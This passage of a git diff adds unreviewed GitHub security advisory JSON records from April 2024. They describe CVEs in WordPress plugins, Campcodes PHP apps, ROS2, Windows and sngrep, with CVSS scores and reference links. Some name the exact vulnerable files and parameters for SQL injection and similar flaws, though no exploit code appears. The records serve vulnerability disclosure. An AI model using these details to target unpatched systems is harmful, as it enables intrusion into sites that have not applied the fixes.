"https://www.wordfence.com/threat-intel/vulnerabilities/id/96bdd465-e4ca-4a32-b38a-a2a51598a3a9?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:17Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-4gjr-9vhm-vxgx/GHSA-4gjr-9vhm-vxgx.json b/advisories/unreviewed/2024/04/GHSA-4gjr-9vhm-vxgx/GHSA-4gjr-9vhm-vxgx.json new file mode 100644 index 00000000000..a0180eb037d --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-4gjr-9vhm-vxgx/GHSA-4gjr-9vhm-vxgx.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4gjr-9vhm-vxgx", + "modified": "2024-04-09T18:30:27Z", + "published": "2024-04-09T18:30:27Z", + "aliases": [ + "CVE-2024-28941" + ], + "details": "Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28941" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-28941" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-122" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-4gm7-w93h-8x3c/GHSA-4gm7-w93h-8x3c.json b/advisories/unreviewed/2024/04/GHSA-4gm7-w93h-8x3c/GHSA-4gm7-w93h-8x3c.json new file mode 100644 index 00000000000..c8603daecf7 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-4gm7-w93h-8x3c/GHSA-4gm7-w93h-8x3c.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4gm7-w93h-8x3c", + "modified": "2024-04-09T21:31:59Z", + "published": "2024-04-09T21:31:59Z", + "aliases": [ + "CVE-2024-1974" + ], + "details": "The HT Mega – Absolute Addons For Elementor plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 2.4.6 via the render function. This makes it possible for authenticated attackers, with contributor access or higher, to read the contents of arbitrary files on the server, which can contain sensitive information.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1974" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/ht-mega-for-elementor/trunk/includes/widgets/htmega_weather.php#L401" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3048999/ht-mega-for-elementor/tags/2.4.7/includes/widgets/htmega_weather.php?old=2939273&old_path=ht-mega-for-elementor/trunk/includes/widgets/htmega_weather.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/11b5f0a1-bf22-46be-a165-c62f1077da0f?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:21Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-4h4c-f8cp-chxw/GHSA-4h4c-f8cp-chxw.json b/advisories/unreviewed/2024/04/GHSA-4h4c-f8cp-chxw/GHSA-4h4c-f8cp-chxw.json new file mode 100644 index 00000000000..79d3dcb2422 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-4h4c-f8cp-chxw/GHSA-4h4c-f8cp-chxw.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4h4c-f8cp-chxw", + "modified": "2024-04-09T18:30:25Z", + "published": "2024-04-09T18:30:25Z", + "aliases": [ + "CVE-2024-26219" + ], + "details": "HTTP.sys Denial of Service Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26219" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26219" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-476" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:41Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-4h68-4rgv-j269/GHSA-4h68-4rgv-j269.json b/advisories/unreviewed/2024/04/GHSA-4h68-4rgv-j269/GHSA-4h68-4rgv-j269.json new file mode 100644 index 00000000000..6a8ace47aec --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-4h68-4rgv-j269/GHSA-4h68-4rgv-j269.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4h68-4rgv-j269", + "modified": "2024-04-09T21:31:56Z", + "published": "2024-04-09T21:31:56Z", + "aliases": [ + "CVE-2023-6965" + ], + "details": "The Pods – Custom Content Types and Fields plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 3.0.10 (with the exception of 2.7.31.2, 2.8.23.2, 2.9.19.2). This is due to the fact that the plugin allows the use of a file inclusion feature via shortcode. This makes it possible for authenticated attackers, with contributor access or higher, to create pods and users (with default role).", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6965" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/pods/trunk/classes/PodsView.php#L750" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3039486%40pods%2Ftrunk&old=3039467%40pods%2Ftrunk&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c5d330cd-ad1f-451e-bf41-39cfeb296cf0?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-4hg6-h83c-r2j6/GHSA-4hg6-h83c-r2j6.json b/advisories/unreviewed/2024/04/GHSA-4hg6-h83c-r2j6/GHSA-4hg6-h83c-r2j6.json new file mode 100644 index 00000000000..2d3e3f4954a --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-4hg6-h83c-r2j6/GHSA-4hg6-h83c-r2j6.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4hg6-h83c-r2j6", + "modified": "2024-04-08T09:31:13Z", + "published": "2024-04-08T09:31:13Z", + "aliases": [ + "CVE-2024-30675" + ], + "details": "Unauthorized node injection vulnerability in ROS2 Iron Irwini in ROS_VERSION 2 and ROS_PYTHON_VERSION 3. This vulnerability could allow a malicious user to escalate privileges by injecting malicious ROS2 nodes into the system remotely.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30675" + }, + { + "type": "WEB", + "url": "https://github.com/yashpatelphd/CVE-2024-30675" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T08:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-4jw4-4g69-7273/GHSA-4jw4-4g69-7273.json b/advisories/unreviewed/2024/04/GHSA-4jw4-4g69-7273/GHSA-4jw4-4g69-7273.json new file mode 100644 index 00000000000..7dc13757f7f --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-4jw4-4g69-7273/GHSA-4jw4-4g69-7273.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4jw4-4g69-7273", + "modified": "2024-04-08T09:31:13Z", + "published": "2024-04-08T09:31:13Z", + "aliases": [ + "CVE-2023-52553" + ], + "details": "Race condition vulnerability in the Wi-Fi module.\nImpact: Successful exploitation of this vulnerability will affect availability.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52553" + }, + { + "type": "WEB", + "url": "https://consumer.huawei.com/en/support/bulletin/2024/3" + }, + { + "type": "WEB", + "url": "https://device.harmonyos.com/en/docs/security/update/security-bulletins-202403-0000001667644725" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-362" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T09:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-4m72-9w9j-m4wh/GHSA-4m72-9w9j-m4wh.json b/advisories/unreviewed/2024/04/GHSA-4m72-9w9j-m4wh/GHSA-4m72-9w9j-m4wh.json new file mode 100644 index 00000000000..6f81eeb58af --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-4m72-9w9j-m4wh/GHSA-4m72-9w9j-m4wh.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4m72-9w9j-m4wh", + "modified": "2024-04-10T00:30:29Z", + "published": "2024-04-10T00:30:29Z", + "aliases": [ + "CVE-2024-3522" + ], + "details": "A vulnerability classified as critical has been found in Campcodes Online Event Management System 1.0. This affects an unknown part of the file /api/process.php. The manipulation of the argument userId leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-259893 was assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3522" + }, + { + "type": "WEB", + "url": "https://github.com/E1CHO/cve_hub/blob/main/Online%20Event%20Management%20System/Online%20Event%20Management%20System%20-%20vuln%201.pdf" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259893" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259893" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.312504" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T23:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-4mgq-4xh9-wr7m/GHSA-4mgq-4xh9-wr7m.json b/advisories/unreviewed/2024/04/GHSA-4mgq-4xh9-wr7m/GHSA-4mgq-4xh9-wr7m.json new file mode 100644 index 00000000000..e67e212c4a4 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-4mgq-4xh9-wr7m/GHSA-4mgq-4xh9-wr7m.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4mgq-4xh9-wr7m", + "modified": "2024-04-09T06:30:44Z", + "published": "2024-04-09T06:30:44Z", + "aliases": [ + "CVE-2024-30686" + ], + "details": "An issue was discovered in ROS2 Iron Irwini versions ROS_VERSION 2 and ROS_PYTHON_VERSION 3, allows remote attackers to execute arbitrary code via packages or nodes within the ROS2 system.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30686" + }, + { + "type": "WEB", + "url": "https://github.com/yashpatelphd/CVE-2024-30686" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T05:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-4mmh-h9hr-3pwj/GHSA-4mmh-h9hr-3pwj.json b/advisories/unreviewed/2024/04/GHSA-4mmh-h9hr-3pwj/GHSA-4mmh-h9hr-3pwj.json new file mode 100644 index 00000000000..8922976d7e3 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-4mmh-h9hr-3pwj/GHSA-4mmh-h9hr-3pwj.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4mmh-h9hr-3pwj", + "modified": "2024-04-09T18:30:26Z", + "published": "2024-04-09T18:30:26Z", + "aliases": [ + "CVE-2024-26237" + ], + "details": "Windows Defender Credential Guard Elevation of Privilege Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26237" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26237" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-416" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:44Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-4mv6-pc6v-wf68/GHSA-4mv6-pc6v-wf68.json b/advisories/unreviewed/2024/04/GHSA-4mv6-pc6v-wf68/GHSA-4mv6-pc6v-wf68.json new file mode 100644 index 00000000000..c57f8dd6a8b --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-4mv6-pc6v-wf68/GHSA-4mv6-pc6v-wf68.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4mv6-pc6v-wf68", + "modified": "2024-04-10T15:30:39Z", + "published": "2024-04-10T15:30:39Z", + "aliases": [ + "CVE-2024-3538" + ], + "details": "A vulnerability was found in Campcodes Church Management System 1.0. It has been classified as critical. Affected is an unknown function of the file /admin/addTithes.php. The manipulation of the argument na leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259908.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3538" + }, + { + "type": "WEB", + "url": "https://github.com/E1CHO/cve_hub/blob/main/Church%20Management%20System/Church%20Management%20System%20-%20vuln%205.pdf" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259908" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259908" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.312539" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T05:15:50Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-4p8q-p8qc-486x/GHSA-4p8q-p8qc-486x.json b/advisories/unreviewed/2024/04/GHSA-4p8q-p8qc-486x/GHSA-4p8q-p8qc-486x.json new file mode 100644 index 00000000000..c3c903ed6c8 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-4p8q-p8qc-486x/GHSA-4p8q-p8qc-486x.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4p8q-p8qc-486x", + "modified": "2024-04-10T00:30:29Z", + "published": "2024-04-10T00:30:29Z", + "aliases": [ + "CVE-2024-3120" + ], + "details": "A stack-buffer overflow vulnerability exists in all versions of sngrep since v1.4.1. The flaw is due to inadequate bounds checking when copying 'Content-Length' and 'Warning' headers into fixed-size buffers in the sip_validate_packet and sip_parse_extra_headers functions within src/sip.c. This vulnerability allows remote attackers to execute arbitrary code or cause a denial of service (DoS) via crafted SIP messages.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3120" + }, + { + "type": "WEB", + "url": "https://github.com/irontec/sngrep/pull/480/commits/f229a5d31b0be6a6cc3ab4cd9bfa4a1b5c5714c6" + }, + { + "type": "WEB", + "url": "https://github.com/irontec/sngrep/releases/tag/v1.8.1" + }, + { + "type": "WEB", + "url": "https://pentraze.com/vulnerability-reports" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T00:15:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-4pjw-6qq7-rmhr/GHSA-4pjw-6qq7-rmhr.json b/advisories/unreviewed/2024/04/GHSA-4pjw-6qq7-rmhr/GHSA-4pjw-6qq7-rmhr.json new file mode 100644 index 00000000000..177d6611cfd --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-4pjw-6qq7-rmhr/GHSA-4pjw-6qq7-rmhr.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4pjw-6qq7-rmhr", + "modified": "2024-04-06T06:31:08Z", + "published": "2024-04-06T06:31:08Z", + "aliases": [ + "CVE-2024-2471" + ], + "details": "The FooGallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via image attachment fields (such as 'Title', 'Alt Text', 'Custom URL', 'Custom Class', and 'Override Type') in all versions up to, and including, 2.4.14 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2471" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3061049%40foogallery&old=3039399%40foogallery&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d5d4aeb1-0a4f-49f1-b5a9-b582e271eae1?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-06T06:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-4q6x-q9wv-7pxv/GHSA-4q6x-q9wv-7pxv.json b/advisories/unreviewed/2024/04/GHSA-4q6x-q9wv-7pxv/GHSA-4q6x-q9wv-7pxv.json new file mode 100644 index 00000000000..48e8b57bc8a --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-4q6x-q9wv-7pxv/GHSA-4q6x-q9wv-7pxv.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4q6x-q9wv-7pxv", + "modified": "2024-04-10T15:30:40Z", + "published": "2024-04-10T15:30:40Z", + "aliases": [ + "CVE-2024-26047" + ], + "details": "Adobe Experience Manager versions 6.5.19 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26047" + }, + { + "type": "WEB", + "url": "https://helpx.adobe.com/security/products/experience-manager/apsb24-21.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T09:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-4r3x-98hq-f543/GHSA-4r3x-98hq-f543.json b/advisories/unreviewed/2024/04/GHSA-4r3x-98hq-f543/GHSA-4r3x-98hq-f543.json new file mode 100644 index 00000000000..d8629ca17c4 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-4r3x-98hq-f543/GHSA-4r3x-98hq-f543.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4r3x-98hq-f543", + "modified": "2024-04-07T18:30:30Z", + "published": "2024-04-07T18:30:30Z", + "aliases": [ + "CVE-2024-31258" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Micro.Company Form to Chat App allows Stored XSS.This issue affects Form to Chat App: from n/a through 1.1.6.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31258" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/form-to-chat/wordpress-form-to-chat-app-plugin-1-1-6-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-07T18:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-4r65-78q5-x99r/GHSA-4r65-78q5-x99r.json b/advisories/unreviewed/2024/04/GHSA-4r65-78q5-x99r/GHSA-4r65-78q5-x99r.json new file mode 100644 index 00000000000..6b47eee2992 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-4r65-78q5-x99r/GHSA-4r65-78q5-x99r.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4r65-78q5-x99r", + "modified": "2024-04-08T12:30:32Z", + "published": "2024-04-08T09:31:14Z", + "aliases": [ + "CVE-2024-23192" + ], + "details": "RSS feeds that contain malicious data- attributes could be abused to inject script code to a users browser session when reading compromised RSS feeds or successfully luring users to compromised accounts. Attackers could perform malicious API requests or extract information from the users account. Please deploy the provided updates and patch releases. Potentially malicious attributes now get removed from external RSS content. No publicly available exploits are known.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23192" + }, + { + "type": "WEB", + "url": "https://documentation.open-xchange.com/appsuite/releases/8.21" + }, + { + "type": "WEB", + "url": "https://documentation.open-xchange.com/appsuite/releases/8.22" + }, + { + "type": "WEB", + "url": "https://documentation.open-xchange.com/appsuite/security/advisories/csaf/2024/oxas-adv-2024-0001.json" + }, + { + "type": "WEB", + "url": "https://software.open-xchange.com/products/appsuite/doc/Release_Notes_for_Patch_Release_6268_7.10.6_2024-02-08.pdf" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T09:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-4rjg-8j2c-ccv6/GHSA-4rjg-8j2c-ccv6.json b/advisories/unreviewed/2024/04/GHSA-4rjg-8j2c-ccv6/GHSA-4rjg-8j2c-ccv6.json new file mode 100644 index 00000000000..d6623c6aae6 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-4rjg-8j2c-ccv6/GHSA-4rjg-8j2c-ccv6.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4rjg-8j2c-ccv6", + "modified": "2024-04-08T03:30:52Z", + "published": "2024-04-08T03:30:52Z", + "aliases": [ + "CVE-2023-52535" + ], + "details": "In vsp driver, there is a possible missing verification incorrect input. This could lead to local denial of service with no additional execution privileges needed", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52535" + }, + { + "type": "WEB", + "url": "https://www.unisoc.com/en_us/secy/announcementDetail/1777148475750809602" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T03:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-4v46-qwhw-4224/GHSA-4v46-qwhw-4224.json b/advisories/unreviewed/2024/04/GHSA-4v46-qwhw-4224/GHSA-4v46-qwhw-4224.json new file mode 100644 index 00000000000..a1eec97d4c3 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-4v46-qwhw-4224/GHSA-4v46-qwhw-4224.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4v46-qwhw-4224", + "modified": "2024-04-09T18:30:26Z", + "published": "2024-04-09T18:30:26Z", + "aliases": [ + "CVE-2024-26248" + ], + "details": "Windows Kerberos Elevation of Privilege Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26248" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26248" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-303" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:46Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-4v53-9g52-rm7v/GHSA-4v53-9g52-rm7v.json b/advisories/unreviewed/2024/04/GHSA-4v53-9g52-rm7v/GHSA-4v53-9g52-rm7v.json new file mode 100644 index 00000000000..cce1ae009d9 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-4v53-9g52-rm7v/GHSA-4v53-9g52-rm7v.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4v53-9g52-rm7v", + "modified": "2024-04-08T18:30:48Z", + "published": "2024-04-08T18:30:48Z", + "aliases": [ + "CVE-2023-7164" + ], + "details": "The BackWPup WordPress plugin before 4.0.4 does not prevent visitors from leaking key information about ongoing backups, allowing unauthenticated attackers to download backups of a site's database.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-7164" + }, + { + "type": "WEB", + "url": "https://wpscan.com/vulnerability/79b07f37-2c6b-4846-bb28-91a1e5bf112e" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T18:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-4vh4-c5mm-jqmw/GHSA-4vh4-c5mm-jqmw.json b/advisories/unreviewed/2024/04/GHSA-4vh4-c5mm-jqmw/GHSA-4vh4-c5mm-jqmw.json new file mode 100644 index 00000000000..6ae3e5c6bec --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-4vh4-c5mm-jqmw/GHSA-4vh4-c5mm-jqmw.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4vh4-c5mm-jqmw", + "modified": "2024-04-08T03:30:52Z", + "published": "2024-04-08T03:30:52Z", + "aliases": [ + "CVE-2023-52342" + ], + "details": "In modem-ps-nas-ngmm, there is a possible undefined behavior due to incorrect error handling. This could lead to remote information disclosure no additional execution privileges needed", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52342" + }, + { + "type": "WEB", + "url": "https://www.unisoc.com/en_us/secy/announcementDetail/1777143682512781313" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T03:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-4w26-p3x4-j4mv/GHSA-4w26-p3x4-j4mv.json b/advisories/unreviewed/2024/04/GHSA-4w26-p3x4-j4mv/GHSA-4w26-p3x4-j4mv.json new file mode 100644 index 00000000000..09e2f827762 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-4w26-p3x4-j4mv/GHSA-4w26-p3x4-j4mv.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4w26-p3x4-j4mv", + "modified": "2024-04-09T06:30:44Z", + "published": "2024-04-09T06:30:44Z", + "aliases": [ + "CVE-2024-30684" + ], + "details": "An insecure logging vulnerability has been identified within ROS2 Iron Irwini versions ROS_VERSION 2 and ROS_PYTHON_VERSION 3, allows attackers to access 